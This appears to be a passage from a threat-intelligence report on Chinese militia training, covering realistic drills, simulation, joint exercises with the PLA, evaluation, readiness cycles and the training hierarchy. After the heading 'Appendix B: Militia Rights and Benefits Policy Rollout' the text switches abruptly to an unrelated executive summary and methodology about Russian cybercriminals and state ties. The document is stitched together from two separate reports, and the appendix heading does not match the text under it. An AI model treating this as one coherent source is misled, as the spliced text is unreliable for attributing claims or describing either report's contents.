Notably, many of these themes are not new. Indeed, the focus on using technology was visible as early as 2008, and a “trend toward greater realism” and training with the PLA since the late 1970s or early 1980s. The difference today is likely the emphasis on, the details of, and expectations for rigorous implementation and institutionalization now that China’s leadership has (re)prioritized military preparedness over economic development and emergency response requirements (as noted in the The Goals and Challenges of Militia Construction and Efforts Under the Militia Construction 14th Five-Year Plan sections). A core element of PLA reforms in the last decade has been enabling integrated joint operations (一体化联合作战). Correspondingly, China's military leadership is focused on strengthening the joint operations system and broader efforts to build an integrated national strategic system and capability, of which the NDMS — and therefore militia forces — are a part. As a result, CMC NDMD and PMD-level authorities are likely increasingly insistent that militia training facilitates joint operations with the PLA and others, becomes more realistic to support the PLA’s requirements and the overall wartime orientation of militia forces, and implements innovations around organization and resource sharing to achieve these goals. The current MMTO likely reflects authorities’ anticipation that militia forces will be able to field a credible capability for supporting the PLA’s requirements under the “Centennial Military Building Goal” (建军一百年奋斗目标) by 2027.

Achieving Realistic Combat Standards

Conducting realistic combat training is almost certainly a central objective of the MMTO. In December 2022, a PLA Daily article asserted that, in recent years, realistic combat training (实案化训练) has become the “basic requirement” of militia training. One question asked by the aforementioned member of a CMC NDMD training review group was reportedly whether activities “meet the real combat standard.” At the start of 2025, the CMC NDMD CPP Committee held an expanded meeting, during which the department’s leadership called for continuing focus within the NDMS (and thus, militia forces) on “realistic combat, practicality, and actual effectiveness” (实战实用实效) in efforts to achieve the 2027 “Military Building Goal.”

Authorities are using methodological approaches and technology to increase the realism of militia training. In their methods, authorities are likely attaching importance to competitive and confrontation-style training. The CMC NDMD has reportedly been actively developing mass training competitions, as have subordinate authorities within the PMD system. The Anhui PMD’s 2025 annual training plan reportedly calls for realistic case confrontation training (实案化对抗训练) in alignment with the “spirit” of an expanded meeting held by the CMC NDMD and Eastern Theater Command CCP Committee. Whether the frequency of such training is increasing is unclear, but red-blue drills (that is, drills which pit a “red” force against a “blue” force in simulated confrontation) are a way this is achieved. For example, in 2023, the Fujian PMD organized air defense fendui for red-blue confrontation live-fire training. In June 2025, local authorities in Henan conducted a red-versus-blue drill involving teams of intelligence reconnaissance forces using drones and signals intelligence to discover their opponent’s location over efforts (such as decoys) to prevent discovery. According to these authorities, this training followed the current MMTO in part by exploring nighttime training — which has been in previous outlines but implementation of which was reportedly limited and outdated.

Another method highlighted in Chinese military media is “no contingency plan” (for example, 不设预案) or “no script” (for example, 无脚本) training. This method likely refers to training in which militia personnel are not told beforehand the specific situations they will face or precise tasks to be performed, creating a test of readiness, skill, adaptability, and “on-the-spot” (临机) decision-making in contrast to “formulaic” (程式化) approaches. For example, one MSD in Guizhou has reportedly reformed its live-fire militia artillery drills by eschewing fires from pre-determined “ideal distances,” “ideal positions,” and “ideal angles” and using “no script,” “no plan,” and “on-the-spot” methods. Authorities have used this method since at least 2006, but some recent reports suggest adoption may be spreading with language like “exploring the new path of responding to emergencies and responding to war under the condition of having no contingency plan.”

Technologically, VR and simulation are pursued as important enablers of realistic, effective, and confrontation-style training, as seen in the aforementioned examples of MMTB modernization. The VR system at Xinjiang Production and Construction Corps Second Division’s MMTB can simulate more than twenty scenarios and is used to support normalized “realistic combat confrontation training.” One provincial-level “militia tactics simulation training center” can reportedly simulate 28 “classic” operations, including urban counter-terrorism and maritime search and rescue. A county in Jiangxi is using VR and simulation platforms to conduct individual training and coordinated training (协同训练) in transportation protection and engineering repair, as well as confrontation training under scenarios such as enemy sabotage of a rail bridge. Zhejiang PMD authorities have also organized district-level militia instructor training using a simulation platform for red-blue offense-defense confrontation drills. In addition to offering an (at least visually) immersive experience, these technologies are valued for enabling training in more risky subjects, keeping costs low, and overcoming other obstacles like limited access to equipment. How widespread VR and other technologies (like augmented reality) are is unclear. There are likely financial and technical considerations that would impact the ability of some jurisdictions to deploy these solutions.

Building Foundation, Special, and Mission Skills

One relatively new facet of the current MMTO likely relates to a tripartite structure for militia training. Although not directly linked to CMC NDMD activities, Chinese military media and local government documents reveal there are three types of instruction that all types of militia receive per the current MMTO. These are “common foundation” (共同基础), “specialized skill” (专业技能), and “mission operations” (任务行动) training. One annual training plan issued by a county-level jurisdiction in Inner Mongolia likely exemplifies the basic concept: the jurisdiction’s militia emergency response forces, specialized forces (including a communications support company), and special forces (namely, a cyber militia platoon for public opinion and propaganda) each received twelve days of training, with three days focused on the “common foundation,” four days focused on specialized skills, and five days focused on mission operations. Common foundation training includes instruction on individual tactics, light arms shooting, grenade throwing, first aid, and camouflage and protection. The first two examples in Appendix C likewise show that cyber militias receive common foundation and specialized training. Other unique forces, such as maritime militias in Hainan also train under this structure.

Authorities very likely adopted this tripartite training approach within the last decade, possibly as part of the MMTO issued in 2018 It does not appear in the likely early 2010s MMTO copy, but is referenced in local government sources and Chinese military media at least as early as 2017 and 2018. References to common foundation training and mission operations training in sources that also mention militias particularly appear to increase in 2019, suggesting their use likely started to become more common around this time (see Figure 4).

Figure 4: Number of local government yearbooks, academic publications, and other sources that reference both militias and common foundation training or mission operations training, 2000-2025; results are likely not exhaustive, and the query structure is imprecise because sources that mention militias could be referencing these training approaches in relation to other forces (Source: Held by Recorded Future)

Figure 5: MMTB construction plan from Liping, Guizhou; fields are designated for shooting, grenade throwing, and camouflage and interference training (which constitute common foundation training), mission operations training, and likely specialized training for engineering support, firefighting and relief, flood prevention and rescue, and health and protection

(Source: Held by Recorded Future)

Training to Support Joint Operations

Of particular importance is the CMC NDMD’s work to normalize joint training and joint exercises between militias and the active-duty armed forces. The goal is to advance the deep integration of militia training with the joint operations training system (联合作战训练体系) so that, ultimately, authorities can mobilize these forces to effectively support joint operations in all domains. This project likely entails top-down changes to the militia system to enhance coordination between the PMDs, military services, local CCP committees, and government and party departments; clarify responsibilities; optimize resource allocation; and improve operating mechanisms. In 2022, the deputy secretary of the Tianjin Garrison CCP Committee described the joint training architecture this way: theater commands write militia mission operations training into the training system to coordinate joint training and exercises with key militia forces; PLA services lead linked and joint training to strengthen their command and coordination with militias; and the PMD system focuses on developing the specialized skills and command skills of militia personnel and the capability of fendui to act as cohesive units (成建制).

The frequency of joint training is unclear — and will likely vary across localities, theater commands, and fendui functions — but compared to the early 2000s, implementation of the related “linked training” concept is likely evolving from sporadic and situational to more institutional. Military-local joint exercises throughout the Hunan PMD are occurring on a regular schedule. One MSD in Hunan reports that its PLA service support militia fendui train with the PLA “every year.” At least one county-level PAFD in Henan has ensured joint training with militias is written into the annual training plans of locally garrisoned troops. Prior to 2016, Hainan authorities were already convening meetings involving military, law enforcement, and civilian forces no less than twice annually, in part to organize joint defense drills. Linked and joint approaches are also enabling militia forces to train using PLA equipment, facilities, and other resources (for example, instructors and teaching materials) to facilitate their development. In at least some training events, active-duty PLA and militia personnel are reorganized into mixed units. Key PLA service support militia fendui may be directly integrated with their PLA counterparts for some training.

Examples of joint training between the militia and PLA include:

• In an unknown year, militia fendui from Shandong reportedly participated in at least one Northern Theater Command joint air defense drill, in which they engaged in radar camouflage, optoelectronics confrontation (光电对抗), and other activities under a complex electromagnetic interference environment.
• In June and October 2023 and November 2024, the Eastern Theater Command Air Force organized daytime and nighttime joint bomb disposal and runway repair exercises with militia forces.
• In January 2025, the Jiangxi PMD organized a “supporting forces conducting mobile operations” drill, during which active-duty “officers and soldiers,” militias, and national defense mobilization support teams exercised for motorized maneuver, mitigating enemy reconnaissance and harassment, and establishing comprehensive support points.
• In January 2025, maritime militia forces likely supported the Eastern Theater Command’s “Strait Thunder-2025A” joint training drill as part of forces exerting “key area and chokepoint control” east and west of Taiwan. In May 2024, maritime militia forces aided the China Coast Guard (another component of China’s armed forces under the PAP) in an inspection and boarding drill near Taiwan in conjunction with Eastern Theater Command’s “Joint Sword 2024A” exercise.
• In June 2025, an element of the PLA Rocket Force organized militia forces for joint training to improve aligned assistance and support capabilities using an approach in which forces mobilized from different PAFDs were assigned to specialize in different tasks. Publicly reported areas of focus included logistics, road repair, and first aid. Eastern Theater Command Rocket Force has previously organized militia training that simulated nighttime firing of the Dongfeng-11 (DF-11) short-range ballistic missile.

Figure 6: An element of the PLA Rocket Force provides logistics training to militia in June 2025 (Source: PLA Rocket Force)

Likely under the objectives of crafting an integrated national strategic system and capability and strengthening with wider NDMS, advancing jointness expands beyond militia engagement with the PLA to include joint training that involves militia and various other military, non-military, and national defense mobilization forces. This also includes working to develop jointness between different fendui and local commands under the PMD system (for example, county-level PAFDs). Supporting militia training through other local resources (such as the resources of hi-tech enterprises) is also a priority. Authorities in Jiangsu are, for instance, turning to enterprises to provide cyber offense-defense environments for militia training. Other examples of these trends include:

• In June 2021, the Sansha Garrison organized island and reef militia forces for common foundation training and specialized training at a PLA Navy base, with some instruction delivered by PAP personnel.
• Likely in 2023, authorities in Anhui conducted joint training and evaluation that involved militia, public security, and civil air defense forces cooperating to repair a radar communications station. Civil air defense personnel provided video command, communications (集群对讲), and signals interference; militia forces repaired damaged radar station “lines"; and public security forces organized counter-UAV defenses.
• In December 2024, the Chongqing Garrison organized a six-day national defense mobilization joint drill and evaluation involving more than 1,000 militia personnel from twelve subordinate districts and counties that (during at least part of the training) formed combined arms groups (合成化编组), where specialized forces were the backbone and emergency response forces the main body.
• In February 2025, authorities in Sichuan organized a training in which militia technical backbone personnel and local technical experts cooperated to develop comprehensive communications support capabilities using equipment from a local communications company. The training particularly involved setting up network links and establishing a satellite base station, followed by a red-blue confrontation drill.
• In July 2025, authorities in Shanxi organized joint training among the PAP provincial zongdui (武警山西省总队), special police (特警), and militia forces that focused on controlling and mitigating a bomb threat. The militia supported mitigation efforts by quarantining the surrounding area and inspecting nearby persons while other forces worked to identify the origin of the threat.

Improving the quality of instruction that militia personnel receive is another line of effort that seeks to benefit from jointness. Likely since 2023 and under the CMC NDMD’s direction, authorities are conducting “militia military training teaching methods demonstration month events” (民兵军事训练教学法示范月活动) that promote cross-jurisdiction exchanges to improve the quality of militia instructors and other key personnel. During the 2024 events, the CMC NDMD “actively explored” tiered training for militia instructors such that the NDMD was responsible for “demonstration subjects” (示范课目), the PMDs responsible for “key and difficult subjects” (重难点课目), and MSDs responsible for “standardized subjects” (范化课目). For example, PMDs organized training in the use of meteorological observation equipment while MSDs organized training for rifle handling and operating a ship. Although how frequently the NDMD itself organizes such training is unclear, demonstration month events are a recurring approach to raising training quality. The CMC NDMD is also guiding PLA theater commands to engage with key militia instructors through on-site exchanges and mutual research during these events. In one 2024 demonstration month event, the Hunan PMD organized training for more than 380 militia instructors from subordinate MSDs and six other provincial-level jurisdictions, with representatives from a special warfare fendui of the Hunan PAP on-site for exchanges.

Appendix C provides additional examples of joint training and engagement between cyber militias and other military and non-military forces and resources.

Evaluating Performance with Accuracy

The CMC NDMD is likely making efforts to increase the rigor of militia training evaluation procedures. The CMC NDMD and every PMD have reportedly insisted on making proper training and evaluation (端正训风考风) a project of the CCP committee (党委工程) and the officers (主官工程). This language suggests an increasing expectation that sub-national authorities be highly attentive to achieving effective militia training and accurate evaluation of that training. More concretely, the CMC NDMD has reportedly “made a systematic deployment” (作出系统部署), “revising and improving” assessment methods, building a system of capability indicators, and conducting capability inspections and evaluations. The basic approach under the current MMTO is likely “train one, evaluate one; qualify one, and train again” (训完一个考核一个，合格一个再训一个), where “one” likely means a training subject (though this is not specified). The CMC NDMD is also regulating training standards and likely pushing the militia system to normalize supervision of training.

Authorities are using technology to support this work. At least in some jurisdictions, technical means are tracking training attendance, generating assessment results, and offering a clear view of mission execution. According to the leadership of the Guizhou PMD War Preparation Construction Bureau, the simulation systems used to achieve realism also provide “capability portraits” that assign numerical scores to skill categories like monitoring and early warning, analysis and judgment, tracking and tracing, and coordination and cooperation. There are further calls to establish a “specialized capability certification system” aligned to national vocational qualification standards, which at least one province has done. Jiangsu authorities are issuing militia “one expertise, many skills” certifications for eight positions, including UAV operator and network engineer.

Corresponding to the wider emphasis on jointness, there is reportedly a requirement to establish an integrated joint evaluation (一体化联合考评) mechanism. In one conception of this, written in the context of strengthening PLA service support militia fendui specifically, the PMD system focuses on evaluating common foundation training outcomes along the existing administrative hierarchy, while the PLA services are mainly responsible for evaluating the development of specialized skills with organizational support from the PAFDs. Training performance outcomes are written into the annual quantitative management targets of the MSDs and PAFDs. Evaluations cover, through separate assessments, the mission operations capability of fendui acting as units (成建制) and their ability to act jointly with active-duty forces.

Figure 7: A cyber militia network equipment maintenance fendui undergoes final assessment after centralized training organized by PMD authorities, likely at the Hunan University of Science and Technology’s School of Computer Science and Engineering (计算机科学与工程学院) (Source: Held by Recorded Future)

Organizing to Sharpen Readiness

The current MMTO likely directs authorities to optimize methods of organizing militia forces to undergo training. The aforementioned CMC NDMD-affiliated interviewees highlighted the importance of innovating training organization in their summary of where authorities should focus their attention, such as by differentiating groups based on qualities and identities, conducting cross-regional joint training for small specializations (新小特专业跨区域联训), and conducting cross-regional centralized joint training (跨区域集中联训).²⁷² In one innovation emphasized by Chinese military media, authorities seek to improve year-round militia readiness by pairing cyclical annual training with a “standby” status. However, many militia personnel likely do not receive training each year. Authorities are also pursuing “centralized” and “distributed” training methods to account for common foundation training requirements, the demands of specialized skillsets, and other challenges. Appendix A further discusses approaches to organizing training under the PMD system’s hierarchical structure.

The core of the militia training regime is annual “centralized training” (集中训练), also called “intensive training” (集训), which involves a group of personnel assembled for multi-day instruction in common foundation skills, specialized skills, and mission operational skills. The MMTO sets general time requirements for training based on the types of personnel and forces to be trained, as well as other factors (see Appendix D). In general, militia personnel today may be commonly expected to undergo seven to twelve days of core training annually. This likely does not include additional time spent in evaluations, certain drills, and other activities. Militia forces also undergo annual evaluations and skill-specific evaluations, get called up for inspections, join mission drills and joint drills with the PLA, receive supplemental training, participate in arms competitions, and compete in capture-the-flag events in the case of cyber militias. Sometimes evaluation and training occur at MMTBs, and at other times take place in unfamiliar terrain.

Figure 8: The cyber offense-defense fendui of the Jilin MSD participates in a cyber offense-defense specialized skills competition and centralized training at a local vocational school (Source: Changbai Bing Ge)
The trend for several decades has been toward consolidation of centralized training, particularly through the use of county and city-level MMTBs under the concept of “base-itization.” One likely increasingly common approach since approximately 2018 to organizing forces for centralized training is “rotation training and standby” (轮训备勤; RT&S) or “centralized” RT&S at MMTBs. In this approach, batches of personnel (分批) are trained at different periods (分期) throughout the annual training cycle. For instance, an MSD in Jiangxi once divided the primary militia organized by more than 340 grassroots PAFDs under its jurisdiction into twelve batches and trained one batch per month. Note that at least some local authorities in China were doing batch training like this by the 1990s. What has likely changed is the breadth of adoption in recent years and emphasis on the “standby” concept, as well as the relationship between “standby,” “rotation training,” “centralized training,” and “base-itized” training.

Figure 9 shows that references to RT&S-related concepts have likely emerged largely since 2018, in contrast to more common and general concepts like “rotation training” and “standby.” For example, only 47% of over 7,000 sources referencing militias and rotation training since 2000 were published in or after 2018, likely indicating the commonality of this concept prior to that year. In contrast, 87% of 1,003 sources referencing militias and RT&S were published in or after 2018, likely indicating its more recent adoption post-reform.

Figure 9: Percentage of local government yearbooks, academic publications, and other sources that reference militias and the named concept in or after 2018, out of all publications with the same references since 2000; concepts calculated independently; results are likely not exhaustive, and the query structure is imprecise because sources that mention militias could be referencing RT&S in different contexts (Source: Held by Recorded Future)

Authorities are pursuing the RT&S approach to improve year-round militia readiness. According to statements by the leadership of one MSD in Jiangxi, RT&S integrates training and use and ensures that militia forces can be called up and effectively employed when there is a need. The approach is linked to the goal of achieving “normal state standby” (常态备勤) among militia forces. Chinese military media coverage highlighting how authorities are implementing RT&S refer to a new organizational system (体制) intended to support this effect. For instance, some authorities are categorizing forces into normal state standby fendui, emergency response reserves fendui, and war readiness duty fendui (战备值班分队). Under this or similar models, the annual training period is likely a given fendui’s period to be on standby for deployment. Some authorities are likely considering additional factors, like anticipated tasks in a given season, when assigning standby status. In 2020, the commander of an MSD in Hunan called for a readiness level classification (分级战备) method, in which the last, current, and next batch of militias to be called up for rotation training come into and fall out of readiness status. In practice, the next batch of forces would likely be considered to have low readiness since they would have gone the longest without training.

Despite the apparent focus on readiness, many (possibly most) militia forces likely do not undergo training every year. The likely early 2010s copy of the MMTO only required training for a fraction of militia forces (see Appendix D). There is a concept of “full personnel coverage” (全员覆盖) or “all personnel participate in training” (全员参训) likely linked to the RT&S approach, which may suggest this expectation is changing, but the concept’s meaning is unclear. One interpretation is that all enlisted militia personnel in a given jurisdiction are trained each year. In 2018, an MSD in Hebei celebrated that its “primary militia training participation rate reached 100% per regulations.” However, some local government documents issued in and after 2018 continue to indicate that training tasks are only assigned to a portion of available forces. For example, one 2024 document indicates a Heilongjiang county should maintain the size of its primary militia at 460 personnel, but the “annual basic training task” only covers 104 people. A 2021 document indicates that a Shandong district has 48 fendui of various types that comprise nearly 2,000 personnel, yet only 302 personnel are designated for training. References to “all personnel” in sources that also mention militias have been rising since the early 2000s, but there is no clear increase in usage that occurred around 2018. Ultimately, definitive conclusions about what this stipulation means and its novelty remain elusive as of this writing.

Despite the trend toward consolidation and use of MMTBs, there are nuances to how authorities organize militia training for different subjects. These nuances likely primarily serve to accommodate the development of highly specialized skill sets and other challenges associated with mustering civilian professionals for extended periods. The overarching concept is likely that common foundation subjects, emergency response subjects, and general use specializations use centralized training methods, more niche specialized skills and special forces — including fendui for cyber offense-defense and frequency spectrum management — use what is called “distributed training” (分散训) or “separate training” (分开练), and mission operations training relies “joint training” (联合训). One 2021 county-level document identifies a range of these methods, including the stipulation that mission operations training should rely on participation in PLA theater command exercises and the drills of military and local government authorities at all levels. Other methods also exist; in one case, the personnel of an engineering repair fendui were assigned to work at a "roadway and bridge” enterprise for four months to develop specialized skills. See Appendix C for additional examples of centralized and distributed approaches to training among cyber militias.

Additionally, there are likely nuances MMTBs authorities use for training. For example, the commander of Guilin Garrison in Guangxi has promoted this pattern for ensuring training quality: common foundation training relies on nearby MMTBs for cooperative training (合训), specialized training relies on training bases (not necessarily MMTBs) with the relevant capabilities for overall training (统筹集训), and mission operations training relies on regions where future operations may occur or PLA service training bases for joint training (合演训).

Assessments of Progress in Militia Construction

The CMC NDMD likely assesses positive progress throughout both the militia force and the wider NDMS within which they sit. This national-level authority assessed “steady” improvement in NDMS capabilities in 2022 and a “significant leap” in 2023. In late 2024 and early 2025, CMC NDMD-affiliated personnel, speaking with China Militia journalists for various news articles, said that authorities have “comprehensively improved the capability for all levels and all types of personnel to carry out diversified tasks,” as well as:

• Begun correcting “problems such as sluggish and loose militia training," in part by introducing more competition in the system to "arouse passion for combat"
• Gradually solved the “old big difficult” problem of insufficient training facilities
• Persisted in advancing the transformation and upgrade of military training
• Done a good job in intensifying the organization of training (组训), using specialized instruction (专长化任教) and simulated training methods, and in standardizing evaluations
• “Actively consolidated” results from the “militia military training teaching methods demonstration month events”
• Improved conditions related to militia training expenses and access to equipment
• Continuously strengthened new-quality force construction

Chinese military media journalists further assert (in their reports documenting activity throughout the militia system, but not attributed to comments from CMC NDMD-affiliated individuals) that authorities have “initially achieved” the transformation from “large”-to-”elite” and developed stronger “bones and muscles"; improved the alignment of militia requirements with skilled personnel, with recruitment of veterans, CCP members, and high-quality talents increasing; standardized the “shape” of militia forces, with emphasis being placed on organization in large- and medium-sized cities, all types of enterprises, development zones, and emerging domains; rectified problems like repetitious organization; worked to emphasize the abilities of fendui to carry out missions as cohesive units (成建制) rather than the quality of individual soldiers; established a “new model” at every level of the PMD system for militia training that is joint with the PLA, facilitated by military academic experts, and makes use of local resources; enlarged training that assists and supports war; and made progress improving militia forces’ access to advanced equipment. Journalists observe that after a series of intensive efforts to normalize training supervision work, correct lenient and unrealistic training styles, and rectify other problems, the “training situation has reversed"; the quality and effectiveness of militia basic training have steadily increased; and mechanisms for supervision, punishment, and reward are more robust.

At the same time, it is still common for Chinese military media to report that authorities have assessed significant shortcomings among their militia forces. For example, while assessing their national defense mobilization capabilities in late 2024, the Fujian PMD found deficient ability among militia cadres to lead forces in executing missions and lax training unfit for the requirements of war. In mid-2025, a county-level PAFD in Guangdong organized an investigation into realistic combat training and the conduct of diversified military tasks, finding major problems that were constraining local militia forces’ capabilities.

As indicated in the Methodology, the foregoing assessments in Chinese military media are credible but not necessarily authoritative. While statements attributed to CMC NDMD-affiliated individuals are somewhat more credible and more likely reflective of actual viewpoints within the CMC NDMD than observations made by journalists, all Chinese military media content is very likely influenced (at least to some extent) by political factors and propaganda objectives. For different pieces of media, objectives likely include stoking domestic enthusiasm for militia work, driving greater effort among authorities implementing reforms, or generating international deterrence effects by portraying militias as increasingly effective. This can likely lead to instances in which the weaknesses of militia forces are overstated or their strengths exaggerated.

Outlook

China’s militia forces are likely developing a credible capability for supporting the PLA in future conflicts, but slowly and likely unevenly. Progress toward authorities’ goals almost certainly continues to face obstacles posed by local budget constraints, bureaucratic inattention, and the contradictions inherent to cultivating nationwide military capabilities within the civilian (including private) economy. Development is likely also to be uneven across localities because certain jurisdictions, such as those near potential conflict zones, likely face greater pressure to improve militia readiness. The slow pace of reform is clear in the observable history: a government white paper published in 2013 highlighted efforts to improve militia structure, equipment, and training — areas in which notable challenges remain more than a decade later.

There are also specific indications that incomplete implementation and missed deadlines hinder today’s objectives. It appears that not all provincial-level jurisdictions have passed a militia benefits package as directed by the CMC NDMD. Five years since militia forces were likely supposed to have “gotten strong,” that development goal has not changed. If the intended effect of the aforementioned “all personnel” concept is to ensure all militia forces receive training each year, this is another area where implementation is facing challenges. Other problems also remain; the rotational training format continues, for instance, to rely on short training periods and long annual cycles, which can negatively affect force capabilities, especially when the force is organized inefficiently.

Still, pockets of excellence are likely emerging, especially in domains where militias can put their skills to use during peacetime. In cyberspace, these pockets of excellence include cyber militias at the cybersecurity companies Qihoo 360 and Antiy. In the maritime domain, the Sansha maritime militia and others have actively contributed to enforcing China’s claim over the South China Sea for more than a decade. The “interoperability and integration” of these maritime militia forces are growing “in scale and sophistication,” according to a 2024 assessment by the United States Department of Defense. Of course, no militia has wartime experience; whether this part-time component of China’s armed forces will function effectively under such pressure remains unknown.

More important than the capabilities of China’s militia forces today is the implications of their reorientation toward wartime requirements, the issuance of the MC 14th FYP, legal reforms to improve the benefits of participating in militia construction, and signs of other reforms since 2018: an increasing focus on systematically improving this component of China’s armed forces. National military and civilian authorities have begun taking necessary steps to guide and support the militia system in overcoming longstanding challenges to recruiting and training an effective force. The elevation of militia work into its own 14th FYP and the coordinated push to pass measures addressing the concerns of militia personnel and the entities (for example, enterprises) in which they are organized provide the clearest indication of this.

Recent evolutions in the militia system should prompt governments, militaries, and national security-focused analysts to begin monitoring (or intensify current monitoring of) militia work in China. Specifically, this analysis should focus on whether militia forces in areas relevant to potential conflicts are starting to outgrow the common understanding of them as neglected, ill-equipped, poorly trained, and primarily oriented toward non-war missions like peacetime social stability. These and other challenges will almost certainly remain relevant to right-sizing China’s militia forces (the capabilities of which Chinese military media may exaggerate, as noted above), but their development is an important aspect of Xi Jinping’s efforts to strengthen China’s armed forces. Thus, these problems may become relevant to a diminishing proportion of forces over time. Growing emphasis on correcting militia deficiencies must be considered when evaluating China’s total military strength relative to that of other countries, as well as China’s ability to mobilize society in support of a war effort. Militia forces likely have the potential to provide a numerical and structural advantage in some domains, such as cyberspace.

Major changes in the level of attention, investment, and time devoted to militia work — such as a confirmed shift to training all militia personnel annually or indications that time spent in training is increasing — can likely serve as a warning indicator about China’s intentions with regard to Taiwan, as authorities would very likely mobilize militia forces to contribute to any future war. This is particularly the case with militia forces in jurisdictions that are most relevant to a Taiwan scenario, like Fujian. Prior to China’s invasion of Vietnam in 1979, militia forces in Yunnan and Guangxi were built up, which reportedly entailed exchanging old weapons for new, undergoing intensified training, and deploying to the border (particularly logistics forces). Changes to militia force posture in areas like Hainan province or Sansha City are likely similarly relevant to assessing risks in the South China Sea.

Authorities are currently formulating China’s 15th FYP. A new iteration of the militia construction plan will likely run from 2026 through 2030. It will likely entail continued emphasis on passing regulations to guarantee militia rights and benefits, upgrading MMTBs, and financing militia force development. A key question is whether the development stage will change; if authorities begin moving away from the “getting real” to “getting good” and “getting strong” formulation, it will likely (depending on the rhetoric used) indicate substantial progress in improving militia training and war preparedness. Given the geographic and functional complexity of the militia system, continued research on specific forces would further refine understanding of China’s reserve military capabilities.

Appendix A: The Militia Training Hierarchy

Militia training is primarily organized under the four-tier hierarchy of the PMD system. According to “China’s National Defense in 2008” (a government-issued white paper), the PMDs are the backbone, MSDs are the main body, county-level PAFDs are the foundation, and grassroots PAFDs are supplemental. Authorities continue to use this hierarchical approach, though the specifics have likely evolved as they seek greater efficiency and better outcomes — authorities have discussed how to “improve” this tiered arrangement since at least 2017. The hierarchical system is also involved in evaluating outcomes at lower levels. As of 2025, Chinese military media alludes to this pattern of tiered training and supervision work: one level is observed by another, one level leads another (一级做给一级看、一级带着一级干). The CMC NDMD serves as a fifth tier, inspecting training performance across PMDs and, in some cases, organizing training.

According to a 2013 description of training responsibilities, the PMDs mainly provide training for new PAFD leadership, militia air defense missile fendui, “a portion” of specialized technical backbone personnel for which organizing training is challenging, and militia instructors; the MSDs mainly provide training for anti-aircraft artillery, communications, engineering, anti-chemical and other specialized technical fendui; and the county-level PAFDs mainly provide training for ground artillery, emergency response, infantry, and aligned specialization fendui.

The essential elements of this approach remain true today, with a division of labor based on roles, resources, and expertise. For example, in 2021, the Inner Mongolia PMD took responsibility for organizing jurisdiction-wide UAV operators, militia instructors, and the backbone forces of the border defense cavalry militia. Per Heilongjiang’s militia work regulations (last updated in 2018), county-level PAFDs are primarily responsible for militia military training. However, PAFDs and their superior MSD can jointly conduct training for challenging specialized technical subjects. During “militia military training teaching methods demonstration month events” in Chongqing, the provincial-level garrison command provides militia instructor “training, evaluation, and arms competitions” each year, while directly subordinate (that is, likely MSD-level) PAFDs organize “general training and evaluation (普训普考) and implement specialized instruction (专长化任教). This pattern likely aligns with the distribution of responsibilities during demonstration month events as led by the CMC NDMD in 2024 (see Training to Support Joint Operations).

A 2018 China National Defense News article on innovating training organizational approaches emphasized the following pattern to facilitate jointness and mitigate training that is overly focused on local missions. County-level PAFD train emergency response fendui and militia forces with “ordinary” specializations, which afterward undergo centralized joint training at superior-level “training centers"; technical fendui that are not highly specialized are trained at the MMTBs of their current level using the “big specialization, small centralization” (大专业小集中) and “small specialization, big centralization” (小专业大集中) methods; and superior levels provide unified training for highly specialized technical forces. The article further calls for “exploring” a two-level method in which PAFDs organize foundation training (基础训练) for “small specializations” while MSDs organize training for “big specializations” and the personnel of militia special forces (for example, cyber militias).

Other significant reforms may be occurring. For example, authorities in Yueyang, Hunan, have stripped PAFDs of their responsibilities to implement militia training because insufficient facilities and instructors greatly impacted training quality. These PAFDs now only muster and manage militia personnel, while the MSD provides unified training and evaluation. However, this may be an isolated case.

It is unclear how this hierarchical structure accommodates “distributed training” formats such as in-place training at enterprises (see the Organizing to Sharpen Readiness section), though authorities continue to supervise forces using these formats (see Appendix C for an example).

Appendix B: Militia Rights and Benefits Policy Rollout

Executive Summary

The Russian cybercriminal ecosystem is undergoing a period of profound transformation, shaped by unprecedented international law enforcement campaigns, shifting domestic enforcement priorities, and enduring ties between organized crime and the Russian state. Operation Endgame, launched in May 2024, targeted ransomware operators, money laundering services, and affiliate infrastructure across multiple Russian jurisdictions. In response, Russian law enforcement agencies have carried out a series of high-profile arrests and seizures. These events mark a departure from Russia’s traditional posture of near-total noninterference in domestic cybercrime, complicating the long-held perception of Russia as a blanket “safe haven” for cybercriminals. Leaked chats and investigative reporting reveal that senior figures within these threat groups often maintained relationships with Russian Intelligence Services, providing data, performing tasking, or leveraging bribery and political connections for impunity.

Within the underground, this has eroded trust, as affiliates complain of scams, impersonation, and selective law enforcement pressure. These shifts have, in turn, accelerated operational changes, from stricter vetting in ransomware-as-a-service (RaaS) programs to ransomware groups rebranding and adopting decentralized communication platforms to mitigate perceived infiltration risks. At the same time, Western governments are hardening their policies against ransomware, moving toward bans on ransom payments, mandatory reporting of incidents, and even offensive cyber operations designed to neutralize adversary infrastructure before attacks occur. This more aggressive stance has coincided with prisoner swaps and negotiations that highlight how high-value cybercriminals function as political assets within Russia’s broader geopolitical calculus.

Dark Covenant 3.0 situates these developments within the broader context of state-criminal interaction in Russia. Cybercrime in this environment cannot be understood solely as a commercial enterprise; it is also a tool of influence, a means of information acquisition, and a liability when it threatens domestic stability or undermines Russian interests. The trajectory of this ecosystem will depend on how Russian authorities balance external pressure, domestic political sensitivities, and the enduring strategic value derived from cybercriminal proxies.

Key Findings

• Recorded Future intelligence shows that the Russian government’s relationship with cybercriminals has evolved from passive tolerance to active management. Since 2023, Insikt Group has identified a measurable shift in how Russian authorities engage with cybercriminal groups: selective enforcement, choreographed arrests, and public “examples” used to reinforce state authority.
• Leaked communications analyzed by Insikt Group expose direct, tasking-level coordination between cybercriminal leaders and Russian intelligence intermediaries.
• Recorded Future dark web collections indicate the Russian cybercriminal underground is fracturing under the dual pressures of state control and internal mistrust, while proprietary forum monitoring and ransomware affiliate chatter show increasing paranoia among operators.
• Recorded Future data reveals how Russian cybercriminal groups are decentralizing operations to evade both Western and domestic surveillance.
• Insikt Group assesses that Russia is now strategically leveraging cybercriminals as geopolitical instruments, as recent observations tie Russian cybercriminal detentions and releases to broader diplomatic cycles.

Methodology

This report narrowly examines the “Dark Covenant” framework — defined and discussed in Insikt Group reports from 2021 and 2023 — between 2024 and 2025. This includes the spectrum of direct, indirect, and tacit relationships between Russia-based (or Russia-aligned) cybercriminal threat actors and elements of the Russian state, and how those relationships adapted under sustained Western pressure from Operation Endgame and related counter-ransomware actions. Our focus is primarily on entities targeted by Operation Endgame, and our temporal scope centers on May 2024 (when Operation Endgame started) through September 2025, with limited historical baselining to prior episodes evidencing state-criminal proximity. This includes Operation Endgame’s actions and subsequent Russian enforcement timelines that illuminate which services or threat actors were targeted by rather than shielded from law enforcement.

